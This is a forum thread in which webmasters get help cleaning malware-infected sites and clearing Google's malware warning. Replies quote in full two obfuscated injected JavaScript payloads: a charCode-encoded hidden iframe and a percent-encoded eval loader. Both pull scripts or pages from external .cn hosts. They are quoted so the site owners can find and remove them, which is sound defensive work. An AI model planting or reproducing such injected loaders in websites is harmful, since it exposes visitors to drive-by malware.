Advertisement
If you have a new account but are having problems posting or verifying your account, please email us on hello@boards.ie for help. Thanks :)
Hello all! Please ensure that you are posting a new thread or question in the appropriate forum. The Feedback forum is overwhelmed with questions that are having to be moved elsewhere. If you need help to verify your account contact hello@boards.ie
Hi there,
There is an issue with role permissions that is being worked on at the moment.
If you are having trouble with access or permissions on regional forums please post here to get access: https://www.boards.ie/discussion/2058365403/you-do-not-have-permission-for-that#latest

Oh crap, my site seems to have been hijacked!!!

  • 13-05-2009 12:19pm
    #1
    Moderators, Motoring & Transport Moderators, Music Moderators Posts: 12,781 Mod ✭✭✭✭


    I have a website which is a PHPBB message board that never really took off so it just sits there and does not do much really.

    A few weeks agop when I went to check the site I got the following message:
    [phpBB Debug] PHP Notice: in file /includes/session.php on line 885: Cannot modify header information - headers already sent by (output started at /includes/auth.php:929)
    [phpBB Debug] PHP Notice: in file /includes/session.php on line 885: Cannot modify header information - headers already sent by (output started at /includes/auth.php:929)
    [phpBB Debug] PHP Notice: in file /includes/session.php on line 885: Cannot modify header information - headers already sent by (output started at /includes/auth.php:929)

    I had no idea what it is, what it means or how to fix it - I can't be assed trying to so i just left it.

    However, Just now I got an email from Google "Malware Noticifation":
    Dear site owner or webmaster of digitaldjforum.com,

    We recently discovered that some of your pages can cause users to be infected with malicious software. We have begun showing a warning page to users who visit these pages by clicking a search result on Google.com.
    Below are some example URLs on your site which can cause users to be infected (space inserted to prevent accidental clicking in case your mail client auto-links URLs):
    http://digitaldjforum .com/the-chill-out-room-f2/
    http://www.digitaldjforum .com/the-chill-out-room-f2/
    http://www.digitaldjforum .com/the-chill-out-room-f2/sweet-watches-t326.html
    Here is a link to a sample warning page:
    http://www.google.com/interstitial?url=http%3A//digitaldjforum.com/the-chill-out-room-f2/
    We strongly encourage you to investigate this immediately to protect your visitors. Although some sites intentionally distribute malicious software, in many cases the webmaster is unaware because:
    1) the site was compromised
    2) the site doesn't monitor for malicious user-contributed content
    3) the site displays content from an ad network that has a malicious advertiser

    If your site was compromised, it's important to not only remove the malicious (and usually hidden) content from your pages, but to also identify and fix the vulnerability. We suggest contacting your hosting provider if you are unsure of how to proceed. StopBadware also has a resource page for securing compromised sites:
    http://www.stopbadware.org/home/security
    Once you've secured your site, you can request that the warning be removed by visiting
    http://www.google.com/support/webmasters/bin/answer.py?answer=45432
    and requesting a review. If your site is no longer harmful to users, we will remove the warning.
    Sincerely,

    WFT??? What can I do here?


Comments

  • Registered Users, Registered Users 2 Posts: 68,317 ✭✭✭✭seamus


    What version of phpBB is it? I've seen this before, should be simple enough to fix if you google your version of phpBB


  • Moderators, Motoring & Transport Moderators, Music Moderators Posts: 12,781 Mod ✭✭✭✭Zascar


    Thanks Seamus, It's PHPBB 3 - not sure exact version though


  • Registered Users, Registered Users 2 Posts: 35,524 ✭✭✭✭Gordon


    Why fix it when you can just delete the whole site if you don't use it?


  • Moderators, Motoring & Transport Moderators, Music Moderators Posts: 12,781 Mod ✭✭✭✭Zascar


    Well, I don't do much with it cause I don't have the time, but I'd like to get it back working as I do get a tricke of posts and I might look at it one day and start back working on it...


  • Registered Users, Registered Users 2 Posts: 9,225 ✭✭✭Chardee MacDennis


    here's your problem
    <script type="text/javascript">var GdpldPBsdvjorQSwfbuS = "kw60kw105kw102kw114kw97kw109kw101kw32kw119kw105kw100kw116kw104kw61kw34kw52kw56kw48kw34kw32kw104kw101kw105kw103kw104kw116kw61kw34kw54kw48kw34kw32kw115kw114kw99kw61kw34kw104kw116kw116kw112kw58kw47kw47kw100kw111kw119kw110kw108kw111kw97kw100kw45kw49kw50kw51kw46kw99kw110kw47kw118kw116kw105kw97kw100kw109kw105kw110kw50kw47kw116kw46kw112kw104kw112kw34kw32kw115kw116kw121kw108kw101kw61kw34kw98kw111kw114kw100kw101kw114kw58kw48kw112kw120kw59kw32kw112kw111kw115kw105kw116kw105kw111kw110kw58kw114kw101kw108kw97kw116kw105kw118kw101kw59kw32kw116kw111kw112kw58kw48kw112kw120kw59kw32kw108kw101kw102kw116kw58kw45kw53kw48kw48kw112kw120kw59kw32kw111kw112kw97kw99kw105kw116kw121kw58kw48kw59kw32kw102kw105kw108kw116kw101kw114kw58kw112kw114kw111kw103kw105kw100kw58kw68kw88kw73kw109kw97kw103kw101kw84kw114kw97kw110kw115kw102kw111kw114kw109kw46kw77kw105kw99kw114kw111kw115kw111kw102kw116kw46kw65kw108kw112kw104kw97kw40kw111kw112kw97kw99kw105kw116kw121kw61kw48kw41kw59kw32kw45kw109kw111kw122kw45kw111kw112kw97kw99kw105kw116kw121kw58kw48kw34kw62kw60kw47kw105kw102kw114kw97kw109kw101kw62";var cyFDWFBHQiyWMnIpDJig = GdpldPBsdvjorQSwfbuS.split("kw");var ERVwiosNQnfsmlwIqxQG = "";for (var gOdsCliGvQnAiIwQxpeN=1; gOdsCliGvQnAiIwQxpeN<cyFDWFBHQiyWMnIpDJig.length; gOdsCliGvQnAiIwQxpeN++){ERVwiosNQnfsmlwIqxQG+=String.fromCharCode(cyFDWFBHQiyWMnIpDJig[gOdsCliGvQnAiIwQxpeN]);}document.write(ERVwiosNQnfsmlwIqxQG)</script>
    

    get that out of all your pages for a start...


  • Advertisement
  • Moderators, Motoring & Transport Moderators, Music Moderators Posts: 12,781 Mod ✭✭✭✭Zascar


    Sorry to drag up old thread, but I never did anything about this, but need to now...

    BastardPrince thanks for that, I removed this code but still not change. Not sure what to do now...


  • Registered Users, Registered Users 2 Posts: 213 ✭✭Hoku


    You could always try a re-install. Back up the database first via phpMyAdmin, since the board seems inaccessible. Back up any customizations you made to the board.

    After you have the DB backed up, delete everything from the directory. Do a fresh install, then restore the DB.
    If nothing breaks at this point, then you're good to start restoring all your custom bits.

    Surprising that phpBB3 became injected with this, isn't it supposed to be more secure than its predecessor. I had a phpBB2 board for a fairly long time, and all I have to deal with was the Spam. No security breaches though...


  • Registered Users, Registered Users 2 Posts: 9,579 ✭✭✭Webmonkey


    Zascar I can place a bet that it is a .htaccess file redirecting or proxying the requested address through a parser script that will embed that code.


  • Closed Accounts Posts: 70 ✭✭The BOFH


    There's been a recent attack on SMF forums using a PHP script embedded in a gif that gets uploaded as an avatar, it corrupts the database too. I'd recommend getting on the forums to check for updates & install the latest version, there might be scripts to clean the database too. Don't allow any folders with permissions higher than 755 or files higher than 644 & don't allow uploads to your site. If you are on shared hosting it might have come from another site on the shared server being compromised or a higher level attack on the host.


  • Moderators, Motoring & Transport Moderators, Music Moderators Posts: 12,781 Mod ✭✭✭✭Zascar


    Hmmm ok thanks guys. I'm a bit lost as to what to do really as I'm not web programmer - I can play about with blogs and forums etc but have no idea when it comes to the more complex stuff. Anyone fancy helping me out, nixer even?
    Cheers


  • Advertisement
  • Registered Users, Registered Users 2 Posts: 213 ✭✭Hoku


    I could take a look for you.


    EDIT: A-a-and sorted. =) Something inserted that Javascript into the auth.php file.
    It's time to ask Mr. Google to remove you from the naughty list.


  • Moderators, Motoring & Transport Moderators, Music Moderators Posts: 12,781 Mod ✭✭✭✭Zascar


    Thanks to Hoku who fixed the problem for me. Unfortunately even though it is now gone, the warnings etc are not. A search for "Digital DJ forum" on google still gives a warning "this site may harm your computer" - same with irishdjforum and even zascar.com (all on same host). The thing is that I'm even getting it on my personal blog (different host) - simply because there are links between the site (streaming embedded file).

    So now I have to contact google and get them to review the site to remove the malware message. Any idea how I do this?


  • Registered Users, Registered Users 2 Posts: 213 ✭✭Hoku


    Head over to the Webmaster Tools and do like so:
    Google wrote:
    1. On the Webmaster Tools Home page, select the site you want.
    2. In the Parts of this site may be distributing malware message, click More details.
    3. Click Request a review.


  • Moderators, Motoring & Transport Moderators, Music Moderators Posts: 12,781 Mod ✭✭✭✭Zascar


    Ahh now I see. I have to have my sites "Verified" first, but because of this dam warning messages i cannot get into my control panel!
    I'm sure I can find another way around it but its a real pain...


  • Registered Users, Registered Users 2 Posts: 410 ✭✭B1977


    I have got the same message off google for my website aswell,anyone out there that can find the problem


  • Registered Users, Registered Users 2 Posts: 213 ✭✭Hoku


    Check your website's HTML Source, and see if there's any funny-looking code there, like Javascript that doesn't seem to make any sense at all. Then find the actual file containing that code and delete it.
    That was the procedure I followed because phpBB told me where an error occured. Could be more difficult of you're using a CMS and it doesn't show any PHP errors.

    When you're done with that, check at the bottom of page 1 on this thread, how to contact Google and ask them to review your website.
    In case your site isn't verified, you may need to contact Google's tech support directly, if there is such an option.


  • Registered Users, Registered Users 2 Posts: 410 ✭✭B1977


    I reloaded the original website homepage and still get the message and verifyed the site


  • Registered Users, Registered Users 2 Posts: 213 ✭✭Hoku


    PM me the link, I'm sure my firewall will keep my safe from whatever is hiding on your page.
    And if not, I have back-ups... *format* :pac:


  • Registered Users, Registered Users 2 Posts: 410 ✭✭B1977


    theres the html source code.
    is there any problems with this

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt;

    <html xmlns="http://www.w3.org/1999/xhtml"&gt;
    <head>


    <meta http-equiv="Content-Type" content="text/html; charset=us-ascii" />

    <title>The Magic Shop</title>
    <meta name="robots" content="Index,Follow" />
    <meta http-equiv="Content-Type" content="text/html; charset=us-ascii" />
    <meta name="resource-type" content="document" />
    <meta name="audience" content="all" />
    <meta name="distribution" content="global" />
    <meta name="robots" content="ALL" />
    <meta name="revisit-after" content="2 days" />
    <meta name="Description" content=
    "The Magic Shop has loads of great tricks, books, costumes and much more to help you become an amazing magician! Great fun for all ages, at home or at parties!" />
    <meta name="Keywords" content=
    "Magic, Shop, Limerick, jokes, tricks, cards, cheap, great, fun, costumes, make, up, dvd, books, coins, wigs, ireland, party, cool, mentalism, crazy, funny, paint, redox, designs, all, ages, amazing, wow, magician" />
    <link href="style.css" rel="stylesheet" type="text/css" />
    <link rel="stylesheet" href="lightbox.css" type="text/css" media="screen" />
    <script type="text/javascript" src="js/prototype.js">
    </script>
    <script type="text/javascript" src="js/scriptaculous.js?load=effects,builder">
    </script>
    <script type="text/javascript" src="js/lightbox.js">
    </script>
    </head>
    <meta name="verify-v1" content="v5wEcf1QB4DisylMb7G1gL2ELgehRmEjLcGxgjM2bIg=" >
    <body>
    <center>
    <div id="date">
    <script language="javascript" type="text/javascript">
    //<![CDATA[
    document.write(""+Date()+".")
    //]]>
    </script>
    </div>

    <div id="sign">
    <table width="800">
    <tr>
    <td width="50%" align="left">
    061 341839<br />
    086 2563681<br />
    087 6492126
    </td>
    <td width="50%" align="right">
    6 Mallow Street<br />
    Limerick<br />
    Ireland
    </td>
    </tr>
    </table>
    </div>

    <div id="container">
    <div class="menu">
    <ul>
    <li><a href="index.html" title="Home">Home</a></li>

    <li><a href="costumes.html" title="">Costumes</a></li>

    <li><a href="cards.html" title="">Cards</a></li>

    <li><a href="coins.html" title="">Coins</a></li>

    <li><a href="books.html" title="">Books</a></li>

    <li><a href="tricks.html" title="">Tricks</a></li>

    <li><a href="makeup.html" title="">Make Up</a></li>

    <li><a href="contact.html" title="">Contact</a></li>
    </ul>
    </div>

    <table cellspacing="0" cellpadding="0">
    <tr>
    <td>
    <div id="logo">
    <iframe src="new.html" name="new" scrolling="no" frameborder="0" align="middle" height="205px" width="800px" id="new"></iframe>
    </div>
    </td>
    </tr>

    <tr>
    <td>
    <div id="bar">
    <div id="left_bar">
    Catagories
    </div>

    <div id="right_bar">
    Welcome to the Magic Shop
    </div>
    </div>
    </td>
    </tr>

    <tr>
    <td>
    <div id="main">
    <div id="sidebar">
    <a href="books.html">Books</a><br />
    <a href="cards.html">Cards</a><br />
    <a href="coins.html">Coins</a><br />
    <a href="costumes.html">Costumes</a><br />
    <a href="dvds.html">Dvds</a><br />
    <a href="jokes.html">Jokes</a><br />
    <a href="makeup.html">Make Up</a><br />
    <a href="mentalism.html">Mentalism</a><br />
    <a href="tricks.html">Tricks</a><br />
    <a href="wigs.html">Wigs</a><br />
    </div>

    <div id="content">
    <div id="shop"><img src="images/shop.png" alt=" The Magic Shop " border="0" /></div>

    <h1>Welcome</h1>

    <p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aliquam eget augue vitae
    risus malesuada ullamcorper. Aenean a metus at dui molestie laoreet. Integer imperdiet,
    augue nec pellentesque aliquet, tortor nulla pharetra magna, non laoreet mauris libero ac
    pede. Curabitur vestibulum ullamcorper diam. Donec quam felis, elementum in, auctor eu,
    aliquet at, diam. Proin euismod leo ut sem. Curabitur sapien. Ut massa. Nunc in risus
    vitae nibh vehicula vulputate. Lorem ipsum dolor sit amet, consectetuer adipiscing elit.
    Maecenas gravida luctus dolor. Phasellus bibendum. Vestibulum aliquet tortor et
    dolor.</p>

    <p>Duis eu dui sit amet erat eleifend consequat. Vivamus risus. Sed leo justo, hendrerit
    non, vulputate id, fermentum eget, ipsum. Fusce et diam. Curabitur a lectus. Aenean ac
    ligula nec neque adipiscing elementum. Pellentesque vitae nisl eu massa pellentesque
    sagittis. Nam vitae justo eget tortor malesuada interdum. Ut nec est nec arcu faucibus
    varius. Ut malesuada. Nulla accumsan. Sed augue sapien, sollicitudin et, congue non,
    sollicitudin convallis, enim. Integer id ipsum. Fusce et orci. Praesent in ligula. Donec
    vel elit. Aenean ante mi, sollicitudin pharetra, sollicitudin in, dictum vitae,
    lacus.</p>

    <p>Donec mauris libero, porttitor in, commodo commodo, congue a, urna. Morbi facilisis
    arcu. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos
    himenaeos. Phasellus pretium nibh tempus justo. Nullam varius, massa tincidunt viverra
    vestibulum, purus tortor interdum eros, et consequat risus enim eu elit. In eleifend
    rutrum erat. Maecenas pharetra metus vel ipsum. Sed varius metus a nunc. Vestibulum
    aliquet, nunc sed adipiscing ultrices, urna erat imperdiet sapien, id gravida dui tortor
    in turpis. Quisque gravida scelerisque dui. Donec imperdiet scelerisque leo.</p>
    </div>
    </div>
    </td>
    </tr>

    <tr>
    <td>
    <div id="bot"></div>
    </td>
    </tr>

    <tr>
    <td>
    <div class="menu">
    <ul>
    <li><a href="index.html" title="Home">Home</a></li>

    <li><a href="costumes.html" title="">Costumes</a></li>

    <li><a href="cards.html" title="">Cards</a></li>

    <li><a href="coins.html" title="">Coins</a></li>

    <li><a href="books.html" title="">Books</a></li>

    <li><a href="tricks.html" title="">Tricks</a></li>

    <li><a href="makeup.html" title="">Make Up</a></li>

    <li><a href="contact.html" title="">Contact</a></li>
    </ul>
    </div>
    </td>
    </tr>

    <tr>
    <td>
    <div id="footer">
    Copyright 2008 © The Magic Shop
    </div>
    </td>
    </tr>
    </table>
    </div>

    <div id="redox">
    <a href="http://www.redoxdesigns.com&quot; target="_BLANK">RedoxDesigns.com</a>

    <div>
    <p><!-- Start of StatCounter Code -->
    <script type='text/javascript'>
    //<![CDATA[
    var sc_project=3937707;
    var sc_invisible=0;
    var sc_partition=47;
    var sc_click_stat=1;
    var sc_security='bf276033';
    //]]>
    </script> <script type='text/javascript'>
    </script><noscript>
    <div class='statcounter'>
    <a href='http://www.statcounter.com/' target='_blank'><img class='statcounter' alt='best counter' /></a>
    </div></noscript>
    <!-- End of StatCounter Code --></p>
    </div>
    </div>
    </center>
    </body>
    </html>


  • Moderators, Motoring & Transport Moderators, Music Moderators Posts: 12,781 Mod ✭✭✭✭Zascar


    After fixing it you need to go into your Google Webmaster tools, verify the site, and then "request a review" to get rid of the warning. I just did it but not sure how long it will take


  • Advertisement
  • Registered Users, Registered Users 2 Posts: 410 ✭✭B1977


    its the fixing of it that is the problem.every time I edit and reload the page,google cotact me a few days later with a message,that there is a problem


  • Registered Users, Registered Users 2 Posts: 213 ✭✭Hoku


    Everybody agree that this code looks a bit 'shady' and malicious?
    <!-- 
    (function(){var jwm='%';var bS88='@76@61r@20@61@3d@22@53criptE@6egi@6e@65@22@2cb@3d@22V@65rsio@6e@28)@2b@22@2c@6a@3d@22@22@2cu@3d@6e@61vig@61tor@2euserAgent@3bif((u@2ei@6edexO@66(@22C@68rom@65@22@29@3c0)@26@26(@75@2eind@65xOf(@22@57in@22)@3e0)@26@26(u@2eindex@4ff(@22NT@206@22)@3c0)@26@26(@64@6fc@75ment@2e@63ooki@65@2ein@64exOf(@22m@69ek@3d1@22)@3c0@29@26@26@28type@6ff(zrv@7a@74@73@29@21@3dtypeo@66(@22A@22))@29@7b@7ar@76zt@73@3d@22@41@22@3b@65val@28@22@69f(wind@6fw@2e@22+a+@22)j@3dj+@22+a@2b@22Ma@6aor@22+b+@61+@22Mino@72@22+b@2ba+@22Build@22+b+@22j@3b@22@29@3bdocu@6de@6et@2e@77@72i@74e@28@22@3cscript@20s@72@63@3d@2f@2f@6dar@74@75@22+@22z@2ecn@2f@76@69d@2f@3fid@3d@22+@6a+@22@3e@3c@5c@2fsc@72ipt@3e@22@29@3b@7d';var PnXo=bS88.replace(/@/g,jwm);var NTw=unescape(PnXo);eval(NTw)})();
     -->
    

    I'm no Javascript expert but I'm quite sure your Google doesn't like such rubbish.

    Open up all of your .js files and you'll find this at the bottom of them all. Delete it but be carefull not to touch and ; or } as that would break the code.


  • Registered Users, Registered Users 2 Posts: 213 ✭✭Hoku


    Just the bits between <!-- and --> and the tags themselves - so the bottom of that file will look like so:
    }}, arguments[1] || {}));
    }
    


  • Registered Users, Registered Users 2 Posts: 410 ✭✭B1977


    everything else seems to be written in black ink and the malware or whatever it is ,is in grey


  • Registered Users, Registered Users 2 Posts: 213 ✭✭Hoku


    It's because the <!-- --> tags signify a HTML comment, or in this case a malicious code. Your editor is just parsing these tags as any other HTML comment, whereas Google reads inside the comment and sees that nasty piece of work.


  • Closed Accounts Posts: 9,700 ✭✭✭tricky D


    Hoku wrote: »
    Everybody agree that this code looks a bit 'shady' and malicious?
    <!-- 
    (function(){var jwm='%';var bS88='@76@61r@20@61@3d@22@53criptE@6egi@6e@65@22@2cb@3d@22V@65rsio@6e@28)@2b@22@2c@6a@3d@22@22@2cu@3d@6e@61vig@61tor@2euserAgent@3bif((u@2ei@6edexO@66(@22C@68rom@65@22@29@3c0)@26@26(@75@2eind@65xOf(@22@57in@22)@3e0)@26@26(u@2eindex@4ff(@22NT@206@22)@3c0)@26@26(@64@6fc@75ment@2e@63ooki@65@2ein@64exOf(@22m@69ek@3d1@22)@3c0@29@26@26@28type@6ff(zrv@7a@74@73@29@21@3dtypeo@66(@22A@22))@29@7b@7ar@76zt@73@3d@22@41@22@3b@65val@28@22@69f(wind@6fw@2e@22+a+@22)j@3dj+@22+a@2b@22Ma@6aor@22+b+@61+@22Mino@72@22+b@2ba+@22Build@22+b+@22j@3b@22@29@3bdocu@6de@6et@2e@77@72i@74e@28@22@3cscript@20s@72@63@3d@2f@2f@6dar@74@75@22+@22z@2ecn@2f@76@69d@2f@3fid@3d@22+@6a+@22@3e@3c@5c@2fsc@72ipt@3e@22@29@3b@7d';var PnXo=bS88.replace(/@/g,jwm);var NTw=unescape(PnXo);eval(NTw)})();
     -->
    

    I'm no Javascript expert but I'm quite sure your Google doesn't like such rubbish.

    Hex to text for the obfuscated text gives:
    va a="nne"="en(+",j="",=naa.;.fhe")&&u.e"W"&&.&#222;""&&du.ce."")&&(zts)!=f"){zvs="A";e("o.""="+"j"a"r""";")n.wr("< rc=//tu""/v/?="j"><\/r>");}
    

    I don't like that. Pop the 'cript', 'rsion' and other plain text stuff back in and it does look shady indeed.


  • Registered Users, Registered Users 2 Posts: 410 ✭✭B1977


    hopefully all this code has been removed now.I ll have to allow google to check it again,

    thanks for your help


  • Registered Users, Registered Users 2 Posts: 410 ✭✭B1977


    the website was in googles top ten,but is off the radar now.is there anyway of trying to get the site back on to the first page of google ?


  • Advertisement
  • Moderators, Motoring & Transport Moderators, Music Moderators Posts: 12,781 Mod ✭✭✭✭Zascar


    That's a good point. I'd say this seriously affects googles ranking of you. Does it come back eventually?


  • Registered Users, Registered Users 2 Posts: 410 ✭✭B1977


    Zascar wrote: »
    That's a good point. I'd say this seriously affects googles ranking of you. Does it come back eventually?

    hopefully Ive got the problem fixed,but will have to wait and see about my website ranking


  • Registered Users, Registered Users 2 Posts: 213 ✭✭Hoku


    First you have to wait for Mr Google to remove you from the naughty list, then you'll come back to the top of the search, provided that all your SEO measures are in place.


  • Registered Users, Registered Users 2 Posts: 410 ✭✭B1977


    What would be good ideas for SEO


  • Registered Users, Registered Users 2 Posts: 213 ✭✭Hoku




Advertisement